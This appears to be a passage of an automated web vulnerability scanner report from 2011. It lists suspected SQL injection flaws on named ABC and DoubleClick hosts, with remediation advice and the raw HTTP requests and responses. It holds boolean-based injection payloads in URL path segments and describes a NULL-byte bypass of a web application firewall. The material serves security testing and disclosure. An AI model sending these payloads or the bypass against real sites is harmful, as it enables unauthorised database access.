SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.
Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.
Issue remediation
The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.
You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:
One common defence is to double up any single quotation marks appearing within user input before incorporating that input into a SQL query. This defence is designed to prevent malformed data from terminating the string in which it is inserted. However, if the data being incorporated into queries is numeric, then the defence may fail, because numeric data may not be encapsulated within quotes, in which case only a space is required to break out of the data context and interfere with the query. Further, in second-order SQL injection attacks, data that has been safely escaped when initially inserted into the database is subsequently read from the database and then passed back to it again. Quotation marks that have been doubled up initially will return to their original form when the data is reused, allowing the defence to be bypassed.
Another often cited defence is to use stored procedures for database access. While stored procedures can provide security benefits, they are not guaranteed to prevent SQL injection attacks. The same kinds of vulnerabilities that arise within standard dynamic SQL queries can arise if any SQL is dynamically constructed within stored procedures. Further, even if the procedure is sound, SQL injection can arise if the procedure is invoked in an unsafe manner using user-controllable data.
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads 97170536'%20or%201%3d1--%20 and 97170536'%20or%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /service97170536'%20or%201%3d1--%20/sfp/omnitureconfig/?pageId=4dc00ac0_f316_48f9_bbbc_df7e9b2d0b9b&showId=SH014193940000&pageURL=http://beta.abc.go.com/shows/charlies-angels HTTP/1.1 Host: a.abc.com Proxy-Connection: keep-alive Referer: http://cdn.media.abc.com/media/_global/player/player1.43.0/flash/SFP_Locke.swf?v1.43.0 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response 1
HTTP/1.1 302 Moved Temporarily Content-Length: 163 Location: http://abc.go.com/error Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: abcmed01 X-Powered-By: ASP.NET X-UA-Compatible: IE=EmulateIE7 Date: Sat, 17 Sep 2011 01:03:35 GMT Connection: close
<HTML><HEAD><TITLE>Moved Temporarily</TITLE></HEAD><BODY>This document has moved to <A HREF="http://abc.go.com/error ">http://abc.go.com/error </A>.<BODY></HTML>
Request 2
GET /service97170536'%20or%201%3d2--%20/sfp/omnitureconfig/?pageId=4dc00ac0_f316_48f9_bbbc_df7e9b2d0b9b&showId=SH014193940000&pageURL=http://beta.abc.go.com/shows/charlies-angels HTTP/1.1 Host: a.abc.com Proxy-Connection: keep-alive Referer: http://cdn.media.abc.com/media/_global/player/player1.43.0/flash/SFP_Locke.swf?v1.43.0 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response 2
HTTP/1.1 200 OK Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 17 Sep 2011 01:03:38 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: abcmed08 X-Powered-By: ASP.NET Cache-Expires: Sat, 17 Sep 2011 01:08:35 GMT X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding Content-Length: 0 Cache-Control: max-age=300 Date: Sat, 17 Sep 2011 01:03:38 GMT Connection: close
The id cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the id cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Content-Length: 1667 Set-Cookie: id=c91da3c3c000047||t=1316221600|et=730|cs=002213fd48f445365653400eb4; path=/; domain=.doubleclick.net; expires=Mon, 16 Sep 2013 01:06:40 GMT P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Set-Cookie: test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Fri, 16 Sep 2011 01:06:40 GMT Date: Sat, 17 Sep 2011 01:06:40 GMT Expires: Sat, 17 Sep 2011 01:06:40 GMT Cache-Control: private, max-age=300
<script type="text/javascript"> var spongecellParams = { clickTag: "http://ad.doubleclick.net/click%3Bh%3Dv8/3b85/f/8b/%2a/i%3B243805900%3B1-0%3B0%3B67516235%3B3454-728/90%3B42127629/42145416/1%3B ...[SNIP]...
1.3. http://ad.doubleclick.net/adj/tmz.toofab.wb.dart/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Tentative
Host:
http://ad.doubleclick.net
Path:
/adj/tmz.toofab.wb.dart/
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /ad'%20and%201%3d1--%20/sponsors/Procter_Gamble/Sep_2011/proc-240x30-0036.gif?clickTag=http%3A//2912a.v.fwmrm.net/ad/l/1%3Fs%3Db035%26t%3D1316221067347346%26adid%3D661886%26reid%3D352172%26arid%3D0%26auid%3D%26cn%3DdefaultClick%26et%3Dc%26_cc%3D%26tpos%3D%26cr%3Dhttp%253A//ad.doubleclick.net/clk%253B245853041%253B70982068%253Bl%253Bpc%253D%255BTPAS_ID%255D&clickTAG=http%3A//2912a.v.fwmrm.net/ad/l/1%3Fs%3Db035%26t%3D1316221067347346%26adid%3D661886%26reid%3D352172%26arid%3D0%26auid%3D%26cn%3DdefaultClick%26et%3Dc%26_cc%3D%26tpos%3D%26cr%3Dhttp%253A//ad.doubleclick.net/clk%253B245853041%253B70982068%253Bl%253Bpc%253D%255BTPAS_ID%255D&clicktag=http%3A//2912a.v.fwmrm.net/ad/l/1%3Fs%3Db035%26t%3D1316221067347346%26adid%3D661886%26reid%3D352172%26arid%3D0%26auid%3D%26cn%3DdefaultClick%26et%3Dc%26_cc%3D%26tpos%3D%26cr%3Dhttp%253A//ad.doubleclick.net/clk%253B245853041%253B70982068%253Bl%253Bpc%253D%255BTPAS_ID%255D HTTP/1.1 Host: adsatt.abc.starwave.com Proxy-Connection: keep-alive Referer: http://cdn.media.abc.com/media/_global/player/player1.43.0/flash/SFP_Locke.swf?v1.43.0 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response 1
HTTP/1.1 404 Not Found Content-Length: 1635 Content-Type: text/html Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: N7ADWEB05 X-Powered-By: ASP.NET Date: Sat, 17 Sep 2011 01:05:08 GMT Connection: close Vary: Accept-Encoding
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <HTML><HEAD><TITLE>The page cannot be found</TITLE> <META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252"> <STYLE type="text/css"> BODY { font: 8pt/12pt verdana } H1 { font: 13pt/15pt verdana } H2 { font: 8pt/12pt verdana } A:link { color: red } A:visited { color: maroon } </STYLE> </HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>
<h1>The page cannot be found</h1> The page you are looking for might have been removed, had its name changed, or is temporarily unavailable. <hr> <p>Please try the following:</p> <ul> <li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li> <li>If you reached this page by clicking a link, contact the Web site administrator to alert them that the link is incorrectly formatted. </li> <li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li> </ul> <h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2> <hr> <p>Technical Information (for support personnel)</p> <ul> <li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li> <li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr), and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li> </ul>
</TD></TR></TABLE></BODY></HTML>
Request 2
GET /ad'%20and%201%3d2--%20/sponsors/Procter_Gamble/Sep_2011/proc-240x30-0036.gif?clickTag=http%3A//2912a.v.fwmrm.net/ad/l/1%3Fs%3Db035%26t%3D1316221067347346%26adid%3D661886%26reid%3D352172%26arid%3D0%26auid%3D%26cn%3DdefaultClick%26et%3Dc%26_cc%3D%26tpos%3D%26cr%3Dhttp%253A//ad.doubleclick.net/clk%253B245853041%253B70982068%253Bl%253Bpc%253D%255BTPAS_ID%255D&clickTAG=http%3A//2912a.v.fwmrm.net/ad/l/1%3Fs%3Db035%26t%3D1316221067347346%26adid%3D661886%26reid%3D352172%26arid%3D0%26auid%3D%26cn%3DdefaultClick%26et%3Dc%26_cc%3D%26tpos%3D%26cr%3Dhttp%253A//ad.doubleclick.net/clk%253B245853041%253B70982068%253Bl%253Bpc%253D%255BTPAS_ID%255D&clicktag=http%3A//2912a.v.fwmrm.net/ad/l/1%3Fs%3Db035%26t%3D1316221067347346%26adid%3D661886%26reid%3D352172%26arid%3D0%26auid%3D%26cn%3DdefaultClick%26et%3Dc%26_cc%3D%26tpos%3D%26cr%3Dhttp%253A//ad.doubleclick.net/clk%253B245853041%253B70982068%253Bl%253Bpc%253D%255BTPAS_ID%255D HTTP/1.1 Host: adsatt.abc.starwave.com Proxy-Connection: keep-alive Referer: http://cdn.media.abc.com/media/_global/player/player1.43.0/flash/SFP_Locke.swf?v1.43.0 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response 2
HTTP/1.1 404 Not Found Content-Type: text/html Server: Microsoft-IIS/7.5 From: n7adweb02 Content-Length: 1245 Date: Sat, 17 Sep 2011 01:05:08 GMT Connection: close Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>404 - File or directory not found.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>404 - File or directory not found.</h2> <h3>The resource you are looking for might have been removed, had its name changed, or is temporarily unavailable.</h3> </fieldset></div> </div> </body> </html>
The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the REST URL parameter 2. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /ad/sponsors'%20and%201%3d1--%20/Procter_Gamble/Sep_2011/proc-240x30-0036.gif?clickTag=http%3A//2912a.v.fwmrm.net/ad/l/1%3Fs%3Db035%26t%3D1316221067347346%26adid%3D661886%26reid%3D352172%26arid%3D0%26auid%3D%26cn%3DdefaultClick%26et%3Dc%26_cc%3D%26tpos%3D%26cr%3Dhttp%253A//ad.doubleclick.net/clk%253B245853041%253B70982068%253Bl%253Bpc%253D%255BTPAS_ID%255D&clickTAG=http%3A//2912a.v.fwmrm.net/ad/l/1%3Fs%3Db035%26t%3D1316221067347346%26adid%3D661886%26reid%3D352172%26arid%3D0%26auid%3D%26cn%3DdefaultClick%26et%3Dc%26_cc%3D%26tpos%3D%26cr%3Dhttp%253A//ad.doubleclick.net/clk%253B245853041%253B70982068%253Bl%253Bpc%253D%255BTPAS_ID%255D&clicktag=http%3A//2912a.v.fwmrm.net/ad/l/1%3Fs%3Db035%26t%3D1316221067347346%26adid%3D661886%26reid%3D352172%26arid%3D0%26auid%3D%26cn%3DdefaultClick%26et%3Dc%26_cc%3D%26tpos%3D%26cr%3Dhttp%253A//ad.doubleclick.net/clk%253B245853041%253B70982068%253Bl%253Bpc%253D%255BTPAS_ID%255D HTTP/1.1 Host: adsatt.abc.starwave.com Proxy-Connection: keep-alive Referer: http://cdn.media.abc.com/media/_global/player/player1.43.0/flash/SFP_Locke.swf?v1.43.0 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response 1
HTTP/1.1 404 Not Found Content-Length: 1635 Content-Type: text/html Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: N7ADWEB05 X-Powered-By: ASP.NET Date: Sat, 17 Sep 2011 01:05:08 GMT Connection: close Vary: Accept-Encoding
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <HTML><HEAD><TITLE>The page cannot be found</TITLE> <META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252"> <STYLE type="text/css"> BODY { font: 8pt/12pt verdana } H1 { font: 13pt/15pt verdana } H2 { font: 8pt/12pt verdana } A:link { color: red } A:visited { color: maroon } </STYLE> </HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>
<h1>The page cannot be found</h1> The page you are looking for might have been removed, had its name changed, or is temporarily unavailable. <hr> <p>Please try the following:</p> <ul> <li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li> <li>If you reached this page by clicking a link, contact the Web site administrator to alert them that the link is incorrectly formatted. </li> <li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li> </ul> <h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2> <hr> <p>Technical Information (for support personnel)</p> <ul> <li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li> <li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr), and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li> </ul>
</TD></TR></TABLE></BODY></HTML>
Request 2
GET /ad/sponsors'%20and%201%3d2--%20/Procter_Gamble/Sep_2011/proc-240x30-0036.gif?clickTag=http%3A//2912a.v.fwmrm.net/ad/l/1%3Fs%3Db035%26t%3D1316221067347346%26adid%3D661886%26reid%3D352172%26arid%3D0%26auid%3D%26cn%3DdefaultClick%26et%3Dc%26_cc%3D%26tpos%3D%26cr%3Dhttp%253A//ad.doubleclick.net/clk%253B245853041%253B70982068%253Bl%253Bpc%253D%255BTPAS_ID%255D&clickTAG=http%3A//2912a.v.fwmrm.net/ad/l/1%3Fs%3Db035%26t%3D1316221067347346%26adid%3D661886%26reid%3D352172%26arid%3D0%26auid%3D%26cn%3DdefaultClick%26et%3Dc%26_cc%3D%26tpos%3D%26cr%3Dhttp%253A//ad.doubleclick.net/clk%253B245853041%253B70982068%253Bl%253Bpc%253D%255BTPAS_ID%255D&clicktag=http%3A//2912a.v.fwmrm.net/ad/l/1%3Fs%3Db035%26t%3D1316221067347346%26adid%3D661886%26reid%3D352172%26arid%3D0%26auid%3D%26cn%3DdefaultClick%26et%3Dc%26_cc%3D%26tpos%3D%26cr%3Dhttp%253A//ad.doubleclick.net/clk%253B245853041%253B70982068%253Bl%253Bpc%253D%255BTPAS_ID%255D HTTP/1.1 Host: adsatt.abc.starwave.com Proxy-Connection: keep-alive Referer: http://cdn.media.abc.com/media/_global/player/player1.43.0/flash/SFP_Locke.swf?v1.43.0 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response 2
HTTP/1.1 404 Not Found Content-Type: text/html Server: Microsoft-IIS/7.5 From: n7adweb02 Content-Length: 1245 Date: Sat, 17 Sep 2011 01:05:08 GMT Connection: close Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>404 - File or directory not found.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>404 - File or directory not found.</h2> <h3>The resource you are looking for might have been removed, had its name changed, or is temporarily unavailable.</h3> </fieldset></div> </div> </body> </html>
The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payloads 19227397'%20or%201%3d1--%20 and 19227397'%20or%201%3d2--%20 were each submitted in the REST URL parameter 3. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /ad/sponsors/Procter_Gamble19227397'%20or%201%3d1--%20/Sep_2011/proc-240x30-0036.gif?clickTag=http%3A//2912a.v.fwmrm.net/ad/l/1%3Fs%3Db035%26t%3D1316221067347346%26adid%3D661886%26reid%3D352172%26arid%3D0%26auid%3D%26cn%3DdefaultClick%26et%3Dc%26_cc%3D%26tpos%3D%26cr%3Dhttp%253A//ad.doubleclick.net/clk%253B245853041%253B70982068%253Bl%253Bpc%253D%255BTPAS_ID%255D&clickTAG=http%3A//2912a.v.fwmrm.net/ad/l/1%3Fs%3Db035%26t%3D1316221067347346%26adid%3D661886%26reid%3D352172%26arid%3D0%26auid%3D%26cn%3DdefaultClick%26et%3Dc%26_cc%3D%26tpos%3D%26cr%3Dhttp%253A//ad.doubleclick.net/clk%253B245853041%253B70982068%253Bl%253Bpc%253D%255BTPAS_ID%255D&clicktag=http%3A//2912a.v.fwmrm.net/ad/l/1%3Fs%3Db035%26t%3D1316221067347346%26adid%3D661886%26reid%3D352172%26arid%3D0%26auid%3D%26cn%3DdefaultClick%26et%3Dc%26_cc%3D%26tpos%3D%26cr%3Dhttp%253A//ad.doubleclick.net/clk%253B245853041%253B70982068%253Bl%253Bpc%253D%255BTPAS_ID%255D HTTP/1.1 Host: adsatt.abc.starwave.com Proxy-Connection: keep-alive Referer: http://cdn.media.abc.com/media/_global/player/player1.43.0/flash/SFP_Locke.swf?v1.43.0 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response 1
HTTP/1.1 404 Not Found Content-Length: 1635 Content-Type: text/html Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: N7ADWEB05 X-Powered-By: ASP.NET Date: Sat, 17 Sep 2011 01:05:09 GMT Connection: close Vary: Accept-Encoding
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <HTML><HEAD><TITLE>The page cannot be found</TITLE> <META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252"> <STYLE type="text/css"> BODY { font: 8pt/12pt verdana } H1 { font: 13pt/15pt verdana } H2 { font: 8pt/12pt verdana } A:link { color: red } A:visited { color: maroon } </STYLE> </HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>
<h1>The page cannot be found</h1> The page you are looking for might have been removed, had its name changed, or is temporarily unavailable. <hr> <p>Please try the following:</p> <ul> <li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li> <li>If you reached this page by clicking a link, contact the Web site administrator to alert them that the link is incorrectly formatted. </li> <li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li> </ul> <h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2> <hr> <p>Technical Information (for support personnel)</p> <ul> <li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li> <li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr), and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li> </ul>
</TD></TR></TABLE></BODY></HTML>
Request 2
GET /ad/sponsors/Procter_Gamble19227397'%20or%201%3d2--%20/Sep_2011/proc-240x30-0036.gif?clickTag=http%3A//2912a.v.fwmrm.net/ad/l/1%3Fs%3Db035%26t%3D1316221067347346%26adid%3D661886%26reid%3D352172%26arid%3D0%26auid%3D%26cn%3DdefaultClick%26et%3Dc%26_cc%3D%26tpos%3D%26cr%3Dhttp%253A//ad.doubleclick.net/clk%253B245853041%253B70982068%253Bl%253Bpc%253D%255BTPAS_ID%255D&clickTAG=http%3A//2912a.v.fwmrm.net/ad/l/1%3Fs%3Db035%26t%3D1316221067347346%26adid%3D661886%26reid%3D352172%26arid%3D0%26auid%3D%26cn%3DdefaultClick%26et%3Dc%26_cc%3D%26tpos%3D%26cr%3Dhttp%253A//ad.doubleclick.net/clk%253B245853041%253B70982068%253Bl%253Bpc%253D%255BTPAS_ID%255D&clicktag=http%3A//2912a.v.fwmrm.net/ad/l/1%3Fs%3Db035%26t%3D1316221067347346%26adid%3D661886%26reid%3D352172%26arid%3D0%26auid%3D%26cn%3DdefaultClick%26et%3Dc%26_cc%3D%26tpos%3D%26cr%3Dhttp%253A//ad.doubleclick.net/clk%253B245853041%253B70982068%253Bl%253Bpc%253D%255BTPAS_ID%255D HTTP/1.1 Host: adsatt.abc.starwave.com Proxy-Connection: keep-alive Referer: http://cdn.media.abc.com/media/_global/player/player1.43.0/flash/SFP_Locke.swf?v1.43.0 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response 2
HTTP/1.1 404 Not Found Content-Type: text/html Server: Microsoft-IIS/7.5 From: n7adweb02 Content-Length: 1245 Date: Sat, 17 Sep 2011 01:05:09 GMT Connection: close Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>404 - File or directory not found.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>404 - File or directory not found.</h2> <h3>The resource you are looking for might have been removed, had its name changed, or is temporarily unavailable.</h3> </fieldset></div> </div> </body> </html>
The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the REST URL parameter 4. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
